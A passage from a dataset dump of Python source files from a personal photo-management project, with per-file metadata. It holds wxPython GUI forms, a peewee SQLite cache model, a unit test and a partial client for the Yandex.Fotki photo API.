top = wx.Frame(None, title=\"Test ImageListCtrl\", size=(600, 400))\r\n top.ilc = ImageListCtrl(top)\r\n\r\n top.ilc.Append(LocalImage(top.ilc, r'D:\\Multimedia\\Photos\\test.jpg'))\r\n top.ilc.Append(LocalImage(top.ilc, r'D:\\Multimedia\\Photos\\test.jpg'))\r\n top.ilc.LoadAll()\r\n top.Show()\r\n app.MainLoop()\r\n\r\nif __name__ == '__main__':\r\n main()"
},
{
"alpha_fraction": 0.6148046851158142,
"alphanum_fraction": 0.6196024417877197,
"avg_line_length": 19.455883026123047,
"blob_id": "aa41b9baf98ef716171c09c5d431ea975a277a1a",
"content_id": "51bc303544241d8f23d0aca77c79fedc4d83f022",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1542,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 68,
"path": "/lib/models/cachedb.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\n\r\nfrom peewee import *\r\n\r\n\r\ndatabase = SqliteDatabase(None)\r\n\r\n\r\nclass BaseModel(Model):\r\n class Meta:\r\n database = database\r\n\r\n\r\nclass Photo(BaseModel):\r\n sid = CharField(unique=True)\r\n remote = BooleanField()\r\n viewed = DateTimeField()\r\n modified = DateTimeField()\r\n width = IntegerField(default=0)\r\n height = IntegerField(default=0)\r\n ratio = FloatField(null=True)\r\n\r\n\r\nclass Image(BaseModel):\r\n photo = ForeignKeyField(Photo, related_name='images', on_delete='cascade', on_update='cascade')\r\n link = CharField(max_length=1024, unique=True)\r\n data = BlobField()\r\n viewed = DateTimeField()\r\n\r\n\r\nclass HashValue(BaseModel):\r\n photo = ForeignKeyField(Photo, related_name='hash_values', on_delete='cascade', on_update='cascade')\r\n sort = IntegerField()\r\n value = FloatField()\r\n\r\n\r\ndef close():\r\n \"\"\"\r\n Если база данных была открыта, то закрывает ее\r\n \"\"\"\r\n if not database.is_closed():\r\n database.close()\r\n\r\n\r\ndef connect(dbname=':memory:'):\r\n \"\"\"\r\n Соединиться с базой данных\r\n @param dbname: имя базы данных\r\n @return: база днных\r\n \"\"\"\r\n close()\r\n database.init(dbname)\r\n database.connect()\r\n database.create_tables([Photo, Image, HashValue], safe=True)\r\n return database\r\n\r\n\r\ndef transaction():\r\n return database.transaction()\r\n\r\n\r\nif __name__ == '__main__':\r\n connect('test.db')\r\n close()\r\n"
},
{
"alpha_fraction": 0.5807169675827026,
"alphanum_fraction": 0.5860257744789124,
"avg_line_length": 37.904327392578125,
"blob_id": "e4a719c24a557a413d646a2316da22abeca7e875",
"content_id": "63a146d0d42e79d7a6c7089eab6dd1ef29119e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18022,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 439,
"path": "/lib/forms/overviewfrm.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n# -*- coding: utf-8 -*-\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\n\r\nimport wx\r\nimport datetime\r\nimport wx.lib.agw.aui as wxaui\r\nfrom lib.widgets import imglistctrl\r\nfrom lib.controllers import progressctr\r\nfrom lib.extra import utils\r\n\r\n\r\nclass PhotoImage(imglistctrl.BaseImage):\r\n\r\n ICONS = {}\r\n\r\n def __init__(self, owner, photo):\r\n \"\"\"\r\n @type photo: photo.MatchedPhoto\r\n \"\"\"\r\n imglistctrl.BaseImage.__init__(self, owner, photo)\r\n if not self.ICONS:\r\n self.ICONS = {\r\n 'PHOTO_YANDEX': wx.Bitmap('share/picture.png'),\r\n 'PHOTO_LOCAL': wx.Bitmap('share/picture_add.png'),\r\n 'PHOTO_MATCHED': wx.Bitmap('share/picture_link.png'),\r\n 'PHOTO_EDITED': wx.Bitmap('share/picture_edit.png'),\r\n 'PHOTO_ERROR': wx.Bitmap('share/picture_error.png'),\r\n }\r\n\r\n def LoadImage(self, w, h):\r\n return self.data.wximage(w, h)\r\n\r\n def DrawBadges(self, dc, width, height, index, selected):\r\n badges = []\r\n if self.data.is_edited():\r\n badges.append(self.ICONS['PHOTO_EDITED'])\r\n elif self.data.is_matched():\r\n badges.append(self.ICONS['PHOTO_MATCHED'])\r\n elif self.data.is_local():\r\n size = self.data.size / 1024.0 / 1024.0 if self.data.size else None\r\n if size > 20:\r\n badges.append(self.ICONS['PHOTO_ERROR'])\r\n else:\r\n badges.append(self.ICONS['PHOTO_LOCAL'])\r\n else:\r\n badges.append(self.ICONS['PHOTO_YANDEX'])\r\n\r\n fx, fy, fw, fh = self.GetFrameRect(width, height)\r\n for index, badge in enumerate(badges):\r\n margin = 5 + 21 * index\r\n dc.DrawBitmap(badge, fx + margin, fy + fh - 21)\r\n\r\n\r\nclass IconStorage:\r\n def __init__(self):\r\n self.imageList = wx.ImageList(16, 16)\r\n self.YANDEX_FOTKI = self.imageList.Add(wx.Bitmap('share/yandex_fotki.png'))\r\n self.PHOTOS = self.imageList.Add(wx.Bitmap('share/photos.png'))\r\n self.ALBUM_YANDEX = self.imageList.Add(wx.Bitmap('share/folder_picture.png'))\r\n self.ALBUM_LOCAL = self.imageList.Add(wx.Bitmap('share/folder_add.png'))\r\n self.ALBUM_MATCHED = self.imageList.Add(wx.Bitmap('share/folder_link.png'))\r\n self.ALBUM_SYNCED = self.imageList.Add(wx.Bitmap('share/folder_search.png'))\r\n self.ALBUM_EDITED = self.imageList.Add(wx.Bitmap('share/folder_green.png'))\r\n self.PHOTO_YANDEX = self.imageList.Add(wx.Bitmap('share/photo.png'))\r\n self.PHOTO_LOCAL = self.imageList.Add(wx.Bitmap('share/photo_add.png'))\r\n self.PHOTO_MATCHED = self.imageList.Add(wx.Bitmap('share/photo_link.png'))\r\n\r\n def GetIcon(self, index):\r\n return self.imageList.GetIcon(index)\r\n\r\n\r\nclass IdStorage:\r\n def __init__(self):\r\n self.ID_LOG_IN = wx.NewId()\r\n self.ID_MENU_FILE_OPEN = wx.NewId()\r\n self.ID_MENU_UPLOAD = wx.NewId()\r\n self.ID_OPEN_SELECTED_PHOTO = wx.NewId()\r\n self.ID_DELETE_SELECTED_PHOTO = wx.NewId()\r\n self.ID_ALBUMS_REFRESH = wx.NewId()\r\n self.ID_ALBUM_CREATE = wx.NewId()\r\n self.ID_ALBUM_RENAME = wx.NewId()\r\n self.ID_ALBUM_SETTINGS = wx.NewId()\r\n self.ID_CURRENT_ALBUM_DELETE = wx.NewId()\r\n self.ID_CURRENT_ALBUM_UPLOAD = wx.NewId()\r\n self.ID_PHOTO_UPLOAD = wx.NewId()\r\n\r\n\r\nclass FindSuccessful(Exception):\r\n def __init__(self, item_id):\r\n self.item_id = item_id\r\n\r\n\r\nclass OverviewForm(wx.Frame):\r\n def __init__(self, controller, title):\r\n \"\"\"\r\n Главная форма\r\n \"\"\"\r\n wx.Frame.__init__(self, None, wx.NewId(), title, size=(1100, 750))\r\n\r\n self.title = title\r\n self.controller = controller\r\n \"\"\"@type : OverviewController\"\"\"\r\n self.icons = IconStorage()\r\n self.ids = IdStorage()\r\n 
self.current_album_id = None\r\n self.current_album_item_id = None\r\n self.selected_album_id = None\r\n\r\n menubar = wx.MenuBar()\r\n menu = wx.Menu()\r\n menu.Append(self.ids.ID_LOG_IN, u\"&Войти\\tCtrl+L\")\r\n menubar.Append(menu, u'&Сервис')\r\n menu = wx.Menu()\r\n menu.Append(self.ids.ID_ALBUMS_REFRESH, u\"Обновить все\\tCtrl+R\")\r\n menu.Append(self.ids.ID_CURRENT_ALBUM_UPLOAD, u\"Загрузить\\tCtrl+U\")\r\n menu.Append(self.ids.ID_CURRENT_ALBUM_DELETE, u\"Удалить\\tCtrl+D\")\r\n menubar.Append(menu, u'Альбом')\r\n menu = wx.Menu()\r\n menu.Append(self.ids.ID_OPEN_SELECTED_PHOTO, u\"&Просмотр\\tF12\")\r\n menubar.Append(menu, u'&Фотография')\r\n self.SetMenuBar(menubar)\r\n\r\n # aui manager\r\n self.auimgr = wxaui.AuiManager()\r\n self.auimgr.SetManagedWindow(self)\r\n self.auimgr.GetArtProvider().SetMetric(wxaui.AUI_DOCKART_SASH_SIZE, 3)\r\n # album tree\r\n self.albumTree = wx.TreeCtrl(self, size=(300, -1))\r\n self.albumTree.SetImageList(self.icons.imageList)\r\n self.auimgr.AddPane(self.albumTree,\r\n wxaui.AuiPaneInfo().Name('albumTree').Left().Layer(1)\r\n .CloseButton(False).CaptionVisible(False))\r\n # image list\r\n self.thumbs = imglistctrl.ImageListCtrl(self)\r\n self.thumbs.SetBackgroundColour('#505050')\r\n self.thumbs.SetSelectionColour('#e5da29')\r\n self.thumbs.SetThumbnailSize(180, 180)\r\n self.auimgr.AddPane(self.thumbs,\r\n wxaui.AuiPaneInfo().Name(\"thumbs\").CenterPane().Position(1))\r\n self.auimgr.Update()\r\n\r\n self.SetIcon(self.icons.GetIcon(self.icons.YANDEX_FOTKI))\r\n self.SetSizeHintsSz(wx.DefaultSize, wx.DefaultSize)\r\n\r\n sbar = wx.StatusBar(self)\r\n fields = [150, 150, 600] # login, photos, actions\r\n sbar.SetFieldsCount(len(fields))\r\n sbar.SetStatusWidths(fields)\r\n self.SetStatusBar(sbar)\r\n\r\n self.Bind(wx.EVT_CLOSE, self.OnClose)\r\n self.Bind(wx.EVT_MENU, self.OnLogin, id=self.ids.ID_LOG_IN)\r\n self.Bind(wx.EVT_MENU, self.OnAlbumsRefresh, id=self.ids.ID_ALBUMS_REFRESH)\r\n self.Bind(wx.EVT_MENU, self.OnAlbumCreate, id=self.ids.ID_ALBUM_CREATE)\r\n self.Bind(wx.EVT_MENU, self.OnAlbumSettings, id=self.ids.ID_ALBUM_SETTINGS)\r\n self.Bind(wx.EVT_MENU, self.OnDeleteCurrentAlbum, id=self.ids.ID_CURRENT_ALBUM_DELETE)\r\n self.Bind(wx.EVT_MENU, self.OnUploadCurrentAlbum, id=self.ids.ID_CURRENT_ALBUM_UPLOAD)\r\n self.Bind(wx.EVT_MENU, self.OnOpenPhoto, id=self.ids.ID_OPEN_SELECTED_PHOTO)\r\n\r\n self.thumbs.Bind(wx.EVT_KEY_DOWN, self.OnChar)\r\n self.thumbs.Bind(wx.EVT_LEFT_DCLICK, self.OnOpenPhoto)\r\n self.thumbs.Bind(imglistctrl.EVT_ILC_IMAGE_SELECTED, self.OnImageSelected)\r\n self.albumTree.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnAlbumTreeSelectionChanged)\r\n self.albumTree.Bind(wx.EVT_TREE_ITEM_MENU, self.OnAlbumTreeContextMenu)\r\n self.albumTree.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnAlbumSelected)\r\n\r\n # События формы ------------------------------------------------------------\r\n\r\n def OnClose(self, event):\r\n self.controller.exit()\r\n self.Destroy()\r\n\r\n def OnImageSelected(self, evt):\r\n img = evt.GetImage()\r\n selected = self.thumbs.GetSelected()\r\n if len(selected) == 1:\r\n ph = selected[0].data\r\n size = round(ph.size / 1024.0 / 1024.0, 2) if ph.size else '??'\r\n self.SetStatusText(u'Фотография \"{}\", размер {} MB'.format(ph.title, size), 2)\r\n if len(selected) == 2:\r\n diff = selected[0].data.similar_to(selected[1].data)\r\n self.SetStatusText(u'Разность: {}'.format(diff), 2)\r\n\r\n def OnChar(self, evt):\r\n keycode = evt.GetKeyCode()\r\n if keycode == wx.WXK_RETURN:\r\n self.OpenSelectedPhoto()\r\n if 
keycode == ord('X'):\r\n self.controller.copy_photo_links(self.thumbs.GetSelectedData())\r\n if keycode == ord('C'):\r\n keycode = ord('1')\r\n keycode -= ord('0')\r\n if evt.GetModifiers() == wx.MOD_CONTROL and keycode in range(1, 10):\r\n self.controller.copy_photos(self.thumbs.GetSelectedData(), keycode)\r\n\r\n def OnAlbumTreeSelectionChanged(self, event):\r\n item_id = event.GetItem()\r\n album = self.albumTree.GetPyData(item_id)\r\n self.selected_album_id = album.id\r\n print album.id\r\n\r\n def OnAlbumTreeContextMenu(self, event):\r\n item_id = event.GetItem()\r\n self.albumTree.SelectItem(item_id)\r\n albumMenu = wx.Menu()\r\n # albumMenu.Append(self.ids.ID_ALBUM_CREATE, u'Новый')\r\n # albumMenu.Append(self.ids.ID_ALBUM_DELETE, u'Удалить')\r\n # albumMenu.Append(self.ids.ID_ALBUM_UPLOAD, u'Загрузить')\r\n albumMenu.Append(self.ids.ID_ALBUM_SETTINGS, u'Настройки')\r\n self.albumTree.PopupMenu(albumMenu)\r\n albumMenu.Destroy()\r\n\r\n def OnAlbumSelected(self, event):\r\n \"\"\"При выборе альбома\"\"\"\r\n item_id = event.GetItem()\r\n album = self.albumTree.GetPyData(item_id)\r\n self.controller.load_album(album)\r\n self.current_album_id = album.id\r\n self.current_album_item_id = item_id\r\n\r\n def OnLogin(self, event):\r\n self.controller.login()\r\n\r\n def OnUpload(self, event):\r\n pass\r\n\r\n def OnOpenPhoto(self, event):\r\n photos = self.thumbs.GetItemsData()\r\n index = self.thumbs.GetSelectionIndex()\r\n self.controller.open_photo(photos, index)\r\n\r\n def OnDeletePhoto(self, event):\r\n f = lambda p: p.data.delete()\r\n self.ForEachSelected(f, u'Удалить фотографии?')\r\n\r\n def OnSmartSyncSettings(self, event):\r\n self.OpenSmartSyncSettings()\r\n\r\n def OnAlbumsRefresh(self, event):\r\n self.controller.refresh_albums()\r\n\r\n def OnAlbumCreate(self, event):\r\n self.CreateAlbumInSelected()\r\n\r\n def OnDeleteCurrentAlbum(self, event):\r\n album = self.albumTree.GetPyData(self.current_album_item_id)\r\n self.controller.delete_album(album)\r\n\r\n def OnUploadCurrentAlbum(self, event):\r\n album = self.albumTree.GetPyData(self.current_album_item_id)\r\n self.controller.upload_album(album)\r\n\r\n def OnAlbumSettings(self, event):\r\n item_id = self.albumTree.GetSelection()\r\n album = self.albumTree.GetPyData(item_id)\r\n self.controller.album_settings(album)\r\n\r\n def OnUploadPhoto(self, event):\r\n self.UploadSelectedPhoto()\r\n\r\n # Функции старта и окончания работы приложения -----------------------------\r\n\r\n def ClearAll(self):\r\n self.SetTitle(self.title)\r\n self.albumTree.DeleteAllItems()\r\n self.thumbs.Clear()\r\n\r\n def SetCurrentAlbum(self, album):\r\n self.current_album_id = album.id\r\n self.current_album_item_id = self.FindAlbumItemId(album.id)\r\n\r\n def GetCurrentAlbum(self):\r\n album = self.albumTree.GetPyData(self.current_album_item_id)\r\n return self.current_album_item_id, album\r\n\r\n def ShowAlbumTree(self, root_album):\r\n \"\"\"\r\n Выводит предварительно созданное дерево альбомов\r\n \"\"\"\r\n def process(item_id, album):\r\n children = sorted(album.children, key=lambda a: a.title)\r\n for child in children:\r\n child_id = self.AppendAlbum(item_id, child)\r\n process(child_id, child)\r\n\r\n if not root_album:\r\n return\r\n self.albumTree.DeleteAllItems()\r\n root_id = self.albumTree.AddRoot(root_album.title)\r\n self.albumTree.SetPyData(root_id, root_album)\r\n self.albumTree.SetItemImage(root_id, self.icons.PHOTOS)\r\n process(root_id, root_album)\r\n self.albumTree.Expand(root_id)\r\n\r\n def ShowPhotos(self, photos, 
progress=None):\r\n\r\n def process_photo(photo):\r\n photo_image = PhotoImage(self.thumbs, photo)\r\n photo_image.Load()\r\n return photo_image\r\n\r\n key = lambda p: p.get_capture_time() or datetime.datetime(2000, 1, 1)\r\n photos = sorted(photos, key=key)\r\n progress = progressctr.Progress.cover(progress)\r\n photo_image_list = list(progress.map(process_photo, photos, title=u'Создаем миниатюры',\r\n message=lambda i, x: x.title))\r\n self.thumbs.AssignImages(photo_image_list)\r\n self.thumbs.Refresh()\r\n\r\n def GetSelectedAlbum(self):\r\n item_id = self.albumTree.GetSelection()\r\n return item_id, self.albumTree.GetPyData(item_id)\r\n\r\n def GetSelectedPhotos(self):\r\n return self.thumbs.GetSelected()\r\n\r\n def AppendAlbum(self, root_id, album):\r\n # задаем название\r\n item_id = self.albumTree.AppendItem(root_id, u'')\r\n self.albumTree.SetPyData(item_id, album)\r\n self.UpdateAlbumItem(item_id, album)\r\n return item_id\r\n\r\n def FindAlbumItemId(self, album_id):\r\n def WalkAlbumTree(node_id):\r\n data = self.albumTree.GetPyData(node_id)\r\n if data.id == album_id:\r\n raise FindSuccessful(node_id)\r\n child_id, cookie = self.albumTree.GetFirstChild(node_id)\r\n while child_id.IsOk():\r\n WalkAlbumTree(child_id)\r\n child_id, cookie = self.albumTree.GetNextChild(node_id, cookie)\r\n try:\r\n WalkAlbumTree(self.albumTree.GetRootItem())\r\n return None\r\n except FindSuccessful as exc:\r\n return exc.item_id\r\n\r\n def UpdateAlbumItem(self, item_id, album):\r\n \"\"\"\r\n @type album: PhotoAlbum\r\n \"\"\"\r\n title = unicode(album.title)\r\n if album.is_synced():\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_SYNCED)\r\n elif album.is_matched():\r\n if not album.children:\r\n title += u' ({}/{})'.format(album.count_remote(), album.count_local())\r\n if album.is_edited():\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_EDITED)\r\n else:\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_MATCHED)\r\n elif album.is_local():\r\n title += u' ({})'.format(album.count_local())\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_LOCAL)\r\n else:\r\n if not album.children:\r\n title += u' ({})'.format(album.count_remote())\r\n self.albumTree.SetItemImage(item_id, self.icons.ALBUM_YANDEX)\r\n self.albumTree.SetItemText(item_id, title)\r\n\r\n def UpdateAlbumView(self, album):\r\n item_id = self.FindAlbumItemId(album.id)\r\n if item_id:\r\n self.UpdateAlbumItem(item_id, album)\r\n\r\n def ReselectAlbum(self):\r\n if not self.selected_album_id:\r\n return\r\n item_id = self.FindAlbumItemId(self.selected_album_id)\r\n if item_id:\r\n self.albumTree.SelectItem(item_id)\r\n return\r\n item_id = self.FindAlbumItemId(self.current_album_id)\r\n if item_id:\r\n self.albumTree.SelectItem(item_id)\r\n\r\n # -------------------------------------------------------------------------\r\n\r\n def ForEachSelected(self, callback, query=None):\r\n selected = self.thumbs.GetSelected()\r\n agreed = not query or wx.MessageBox(query, u'Внимание', wx.OK | wx.CANCEL) == wx.OK\r\n if not (selected and agreed):\r\n return\r\n\r\n @utils.http_handler\r\n @utils.long_time\r\n def processor():\r\n count = len(selected) + 1\r\n pdlg = wx.ProgressDialog(title=u'Выполняем операцию...',\r\n message=u'Выполняем операцию...',\r\n maximum=count,\r\n parent=self)\r\n try:\r\n for idx, photo in enumerate(selected):\r\n pdlg.Update(idx, u'Фотография {}: {}'.format(idx + 1, photo.data.title))\r\n callback(photo)\r\n pdlg.Update(count, u'Обновление альбома')\r\n 
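# Presumably refreshes the current album view after the batch operation;\r\n                # note: relies on self.current_album / LoadAlbum being provided elsewhere.\r\n                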
self.LoadAlbum(self.current_album)\r\n finally:\r\n pdlg.Destroy()\r\n\r\n processor()\r\n\r\n def OpenSmartSyncSettings(self):\r\n item_id = self.albumTree.GetSelection()\r\n album = self.albumTree.GetPyData(item_id)\r\n print album.id\r\n\r\n def CreateAlbumInSelected(self):\r\n item_id, album = self.GetSelectedAlbum()\r\n if album.count:\r\n wx.MessageBox(u'Нельзя создать альбом в непустом альбоме', u'Ошибка', wx.OK | wx.ICON_ERROR)\r\n return\r\n dlg = wx.TextEntryDialog(self, u'Введите название нового альбома',\r\n u'Создаем новый альбом в \"{}\"'.format(album.title))\r\n if dlg.ShowModal() == wx.ID_OK:\r\n new_album = album.create_album(dlg.GetValue())\r\n if not new_album:\r\n return\r\n new_item_id = self.AppendAlbum(item_id, new_album)\r\n self.albumTree.Expand(item_id)\r\n self.albumTree.SelectItem(new_item_id)\r\n self.LoadAlbum(new_item_id, new_album)\r\n dlg.Destroy()\r\n\r\n def DeleteSelectedAlbum(self):\r\n item_id, album = self.GetSelectedAlbum()\r\n if wx.MessageBox(u'Вы действительно хотите удалить альбом \"{}\"?'.format(album.title),\r\n u'Внимание', wx.YES_NO | wx.ICON_WARNING) == wx.YES:\r\n album.delete()\r\n self.albumTree.Delete(item_id)\r\n\r\n def UploadSelectedPhoto(self):\r\n f = lambda p: self.current_album.upload(p.data)\r\n self.ForEachSelected(f, u'Загрузить фотографии?')\r\n"
},
{
"alpha_fraction": 0.43986254930496216,
"alphanum_fraction": 0.5549828410148621,
"avg_line_length": 27.200000762939453,
"blob_id": "400d70370c59a8fcc3cb3647a2464ba8594473a9",
"content_id": "2d28b4db6eef57a0289a57f82abdbb61926f9ed6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 20,
"path": "/tests.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! -*- coding: utf-8 -*-\r\n\r\nimport unittest\r\nimport utils\r\n\r\n__author__ = 'anton'\r\n\r\nclass Test(unittest.TestCase):\r\n def test_fit(self):\r\n self.assertEquals((10, 10), utils.fit(10, 10, 10, 10))\r\n self.assertEquals((10, 10), utils.fit(10, 10, 10, 10))\r\n self.assertEquals((5, 5), utils.fit(10, 10, 5, 5))\r\n self.assertEquals((10, 5), utils.fit(20, 10, 10, 10))\r\n self.assertEquals((5, 10), utils.fit(10, 20, 10, 10))\r\n self.assertEquals((10, 20), utils.fit(20, 40, 10, 20))\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()"
},
{
"alpha_fraction": 0.5853675007820129,
"alphanum_fraction": 0.5909586548805237,
"avg_line_length": 32.714942932128906,
"blob_id": "f0c20f3c21d62a44fa264d99a9a1bedb60e0bfb8",
"content_id": "10edea2756c702889e7174c0537d33fec1258f52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16960,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 435,
"path": "/lib/models/yafotki.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\n# -*- coding: utf-8 -*-\n\nimport urllib\nimport urllib2\nimport re\nimport json\nimport mimetypes\nimport pprint\nimport datetime\nimport time\nimport yarsa\n\n\nclass YandexError(Exception):\n pass\n\n\nclass YandexService(object):\n def __init__(self, username, password='', token=''):\n \"\"\"\n Инициализировать работу с сервисом Яндекс.Фотки\n @param username: имя пользователя\n @param password: пароль\n @param token: авторизационный токен, может быть указан вместо пароля\n \"\"\"\n self.username = username\n self.password = password\n self.token = token\n\n self.data = {}\n self.albums_href = ''\n self.photos_href = ''\n self.tags_href = ''\n\n def auth(self, strict=True):\n \"\"\"\n Запрос авторизационного токена. Если все прошло удачно,\n то внутри сервиса будет установлен авторизационный токен, иначе\n будет вызвано исключение HTTPError\n \"\"\"\n\n def extract(tag, text):\n match = re.search('<{0}>(.*?)</{0}>'.format(tag), text)\n return match.group(1) if match else ''\n\n # Шаг 1. Получение открытого ключа\n answer = urllib2.urlopen('http://auth.mobile.yandex.ru/yamrsa/key/')\n answer = answer.read()\n # Извлечение данных об открытом ключе\n public_key = extract('key', answer)\n request_id = extract('request_id', answer)\n # Шаг 2. Шифрование данных открытым ключом\n message = '<credentials login=\"{0}\" password=\"{1}\"/>'\n message = message.format(self.username, self.password)\n encoded = yarsa.encode(public_key, message)\n # Шаг 3. Передеча данных на сервер яндекса\n request = urllib2.Request('http://auth.mobile.yandex.ru/yamrsa/token/')\n data = urllib.urlencode({'request_id': request_id, 'credentials': encoded})\n request.add_data(data)\n request.add_header('Content-Length', len(data))\n request.add_header('Content-Type', 'application/x-www-form-urlencoded')\n answer = urllib2.urlopen(request)\n answer = answer.read()\n # Извлекаем токен из ответа сервера\n self.token = extract('token', answer)\n if strict and not self.token:\n raise YandexError('Token is empty')\n\n def request(self, url, data=None, headers=None, code=200, method=None):\n \"\"\"\n Запрос к сервису Яндекс.Фотки\n При ошибках возникнет исключение HTTPError\n @param url: адрес запроса\n @param data: данные, которые будут переданы в теле запроса\n @param headers: дополнительные заголовки\n @param code: ожидаемый код завершения запроса\n @param method: если требуется, можно указать нестандартный метод,\n к примеру PUT\n @return: результат запроса - документ JSON, который парсится и возвращается в\n виде стандартных объектов Python.\n \"\"\"\n request = urllib2.Request(url)\n request.add_header('Accept', 'application/json')\n # проверяем авторизацию\n if self.token:\n request.add_header('Authorization',\n 'FimpToken realm=\"fotki.yandex.ru\", token=\"{0}\"'.format(self.token))\n # Если есть данные, добавляем данные\n if data:\n request.add_data(data)\n request.add_header('Content-Length', len(data))\n # Если есть дополнительные заголовки, то добавляем их\n if headers:\n for h in headers:\n request.add_header(h, headers[h])\n # грязный трюк\n if method:\n request.get_method = lambda: method\n # добавляем дополнительные параметры запроса\n # empty\n # Выполняем запрос\n answer = urllib2.urlopen(request)\n # Проверяем полученный код ответа\n if answer.code != code:\n # N.B. хрен знает, что значит последний параметр fp. 
Поставил None\n raise urllib2.HTTPError(url, answer.code, 'Bad code', {}, None)\n answer = answer.read()\n return json.loads(answer) if answer else {}\n\n def load(self, username='', password='', token='', strict=True):\n \"\"\"\n Загрузить мета-информацию о профиле пользователя на сервисе.\n Если указать имя пользователя, то будет загружена информация о конкретном пользователе.\n @param username: имя пользователя\n @param password: пароль\n @param token: авторизационный токен, может быть указан вместо пароля\n \"\"\"\n if username:\n self.username = username\n self.password = password\n self.token = token\n if not self.token and self.password:\n self.auth(strict)\n url = 'http://api-fotki.yandex.ru/api/users/{0}/'.format(self.username)\n self.data = self.request(url)\n self.albums_href = self.data['collections']['album-list']['href']\n self.photos_href = self.data['collections']['photo-list']['href']\n self.tags_href = self.data['collections']['tag-list']['href']\n\n def is_auth(self):\n return bool(self.token)\n\n def iter_entries(self, url, scheme, count=None, rlimit=100):\n \"\"\"\n Возвращает итератор по объектам, которые определяются параметром scheme.\n\n @param url: адрес коллекции\n @param scheme: Объект, в который будут преобразованы элементы\n @type count: int\n @param count: количество возвращаемых объектов,\n None - все объекты\n @type rlimit: int\n @param rlimit: количество объектов, возвращаемых в одном запросе,\n но не больше 100 (ограничение Яндекс для постраничной\n выдачи коллекций)\n @rtype: __generator\n \"\"\"\n # проверяем, чтобы максимально в выдаче стояло не больше 100 элементов\n if rlimit > 100:\n rlimit = 100\n # если количество запрашиваемых элементов не больше 100, столько и запросим\n if count and count < 100:\n rlimit = count\n # добавляем параметр лимита в запрос\n next_item = url + ('?' if url.find('?') < 0 else '&') + 'limit={0}'.format(rlimit)\n while next_item:\n data = self.request(next_item)\n for i in data['entries']:\n yield scheme(self, i)\n if count is not None:\n count -= 1\n if count <= 0:\n return\n next_item = data['links'].get('next')\n\n def iter_albums(self, count=None, rlimit=100):\n \"\"\"\n Возвращает итератор по альбомам. Если вы хотите построить иерархию альбомов,\n разумнее воспользоваться методом get_albums для получения сразу всех альбомов.\n @type count: int\n @param count: количество возвращаемых альбомов,\n None - все альбомы\n @type rlimit: int\n @param rlimit: количество альбомов, возвращаемых в одном запросе,\n но не больше 100 (ограничение Яндекс для постраничной\n выдачи коллекций)\n @rtype: __generator of YandexAlbum\n \"\"\"\n return self.iter_entries(self.albums_href, YandexAlbum, count, rlimit)\n\n @property\n def albums(self):\n \"\"\"\n Возвращает все альбомы. Если альбомов очень много, разумнее\n воспользоваться генератором iter_albums.\n @rtype: list of YandexAlbum\n \"\"\"\n return list(self.iter_albums())\n\n def iter_photos(self, count=None, rlimit=100):\n \"\"\"\n @type count: int\n @param count: количество возвращаемых фотографий,\n None - все фотографии\n @type rlimit: int\n @param rlimit: количество фотографий, возвращаемых в одном запросе,\n но не больше 100 (ограничение Яндекс для постраничной\n выдачи коллекций)\n @rtype: __generator of YandexPhoto\n \"\"\"\n return self.iter_entries(self.photos_href, YandexPhoto, count, rlimit)\n\n @property\n def photos(self):\n \"\"\"\n Возвращает все фотографии. 
Если фотографий очень много, разумнее\n воспользоваться генератором iter_photos.\n @rtype: list of YandexPhoto\n \"\"\"\n return list(self.iter_photos())\n\n def iter_tags(self, count=None, rlimit=100):\n return self.iter_entries(self.tags_href, YandexTag, count, rlimit)\n\n def create_album(self, title, summary=None, parent=None):\n \"\"\"\n Создать новый альбом\n @param title: Название\n @param summary: Описание\n @type parent: YandexAlbum\n @param parent: Родительский альбом\n @return: Новый созданный альбом\n \"\"\"\n data = {'title': title}\n if summary:\n data['summary'] = summary\n if parent:\n data['links'] = {'album': parent.link_self}\n headers = {'Content-Type': 'application/json; type=entry'}\n answer = self.request(self.albums_href, json.dumps(data), headers, code=201)\n return YandexAlbum(self, answer)\n\n def __str__(self):\n return pprint.pformat(self.data)\n\n @property\n def id(self):\n \"\"\"Уникальный идентификатор сущности\"\"\"\n return None\n\n @property\n def link_self(self):\n return None\n\n\nclass YandexEntry(object):\n def __init__(self, service, data):\n \"\"\"\n @type service: YandexService\n @type data: dict\n @param data: словарь параметров сущности\n \"\"\"\n self.service = service\n self.data = data\n\n @staticmethod\n def convert_time(ts, tz=True):\n if not ts:\n return None\n dt = datetime.datetime.strptime(ts, '%Y-%m-%dT%H:%M:%SZ')\n if tz:\n dt = dt - datetime.timedelta(seconds=time.timezone)\n return dt\n\n @property\n def id(self):\n \"\"\"Уникальный идентификатор сущности\"\"\"\n return self.data['id']\n\n @property\n def title(self):\n \"\"\"Заголовок сущности\"\"\"\n return self.data.get('title', '')\n\n def link(self, name='self'):\n return self.data['links'].get(name)\n\n @property\n def link_self(self):\n return self.link('self')\n\n @property\n def link_edit(self):\n return self.link('edit')\n\n @property\n def link_parent(self):\n return self.link('album')\n\n @property\n def link_alt(self):\n return self.link('alternate')\n\n @property\n def created(self):\n return self.convert_time(self.data.get('created'), False)\n\n @property\n def edited(self):\n return self.convert_time(self.data.get('edited'))\n\n @property\n def published(self):\n return 